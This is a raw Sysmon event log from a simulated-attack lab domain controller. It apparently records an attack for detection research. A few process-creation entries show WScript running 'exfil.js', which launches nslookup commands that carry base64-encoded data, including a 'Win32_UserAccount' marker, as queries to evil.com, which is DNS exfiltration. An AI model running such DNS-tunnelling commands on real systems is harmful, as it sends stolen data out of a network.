354300x8000000000000000208550Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.976{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50631- 354300x8000000000000000208549Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.976{00000000-0000-0000-0000-000000000000}5552<unknown process>-udptruefalse127.0.0.1-50631-false127.0.0.1-53domain 354300x8000000000000000208548Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.976{00000000-0000-0000-0000-000000000000}5552<unknown process>-udpfalsefalse127.0.0.1-50630-false127.0.0.1-53domain 354300x8000000000000000208547Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.975{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50630- 354300x8000000000000000208546Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.975{00000000-0000-0000-0000-000000000000}5552<unknown process>-udptruefalse127.0.0.1-50630-false127.0.0.1-53domain 354300x8000000000000000208545Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.911{00000000-0000-0000-0000-000000000000}6372<unknown process>-udpfalsefalse127.0.0.1-50629-false127.0.0.1-53domain 354300x8000000000000000208544Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.911{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50629- 354300x8000000000000000208543Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.911{00000000-0000-0000-0000-000000000000}6372<unknown process>-udptruefalse127.0.0.1-50629-false127.0.0.1-53domain 354300x8000000000000000208542Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.910{00000000-0000-0000-0000-000000000000}6372<unknown process>-udpfalsefalse127.0.0.1-50628-false127.0.0.1-53domain 354300x8000000000000000208541Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.910{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50628- 354300x8000000000000000208540Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.910{00000000-0000-0000-0000-000000000000}6372<unknown process>-udptruefalse127.0.0.1-50628-false127.0.0.1-53domain 354300x8000000000000000208539Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.910{00000000-0000-0000-0000-000000000000}6372<unknown process>-udpfalsefalse127.0.0.1-50627-false127.0.0.1-53domain 354300x8000000000000000208538Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.910{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50627- 354300x8000000000000000208537Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.910{00000000-0000-0000-0000-000000000000}6372<unknown process>-udptruefalse127.0.0.1-50627-false127.0.0.1-53domain 354300x8000000000000000208536Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.851{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50626- 354300x8000000000000000208535Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.851{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50625- 354300x8000000000000000208534Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.850{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50624- 354300x8000000000000000208533Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.789{00000000-0000-0000-0000-000000000000}4288<unknown process>-udpfalsefalse127.0.0.1-50623-false127.0.0.1-53domain 354300x8000000000000000208532Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.788{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50623- 354300x8000000000000000208531Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.788{00000000-0000-0000-0000-000000000000}4288<unknown process>-udptruefalse127.0.0.1-50623-false127.0.0.1-53domain 354300x8000000000000000208530Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.788{00000000-0000-0000-0000-000000000000}4288<unknown process>-udpfalsefalse127.0.0.1-50622-false127.0.0.1-53domain 354300x8000000000000000208529Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.788{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50622- 354300x8000000000000000208528Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.788{00000000-0000-0000-0000-000000000000}4288<unknown process>-udptruefalse127.0.0.1-50622-false127.0.0.1-53domain 10341000x8000000000000000208527Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.443{2E1864BB-18EA-629A-7643-000000005F02}42963504C:\Windows\system32\conhost.exe{2E1864BB-18EA-629A-7543-000000005F02}7732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000208526Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.788{00000000-0000-0000-0000-000000000000}4288<unknown process>-udpfalsefalse127.0.0.1-50621-false127.0.0.1-53domain 354300x8000000000000000208525Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.788{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50621- 354300x8000000000000000208524Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.788{00000000-0000-0000-0000-000000000000}4288<unknown process>-udptruefalse127.0.0.1-50621-false127.0.0.1-53domain 10341000x8000000000000000208523Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.411{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-7643-000000005F02}4296C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208522Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.411{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-7543-000000005F02}7732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208521Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.411{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208520Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.411{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208519Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.411{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208518Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.411{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208517Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.411{2E1864BB-18E0-629A-6742-000000005F02}39762692C:\Windows\System32\WScript.exe{2E1864BB-18EA-629A-7543-000000005F02}7732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208516Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.420{2E1864BB-18EA-629A-7543-000000005F02}7732C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxqwo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208515Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.411{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwydssx.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208514Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.358{2E1864BB-18EA-629A-7343-000000005F02}76487292C:\Windows\system32\conhost.exe{2E1864BB-18EA-629A-7443-000000005F02}2076C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208513Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.358{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208512Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.358{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208511Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.358{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208510Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.358{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208509Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.343{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-7443-000000005F02}2076C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208508Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.343{2E1864BB-18EA-629A-7243-000000005F02}71448032C:\Windows\system32\cmd.exe{2E1864BB-18EA-629A-7443-000000005F02}2076C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208507Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.358{2E1864BB-18EA-629A-7443-000000005F02}2076C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EA-629A-7243-000000005F02}7144C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwydssx.tmp 2>&1 10341000x8000000000000000208506Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.327{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EA-629A-7343-000000005F02}7648C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208505Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.327{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EA-629A-7343-000000005F02}7648C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208504Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.327{2E1864BB-18EA-629A-7343-000000005F02}76487292C:\Windows\system32\conhost.exe{2E1864BB-18EA-629A-7243-000000005F02}7144C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208503Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.312{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-7343-000000005F02}7648C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208502Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.312{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208501Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.312{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208500Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 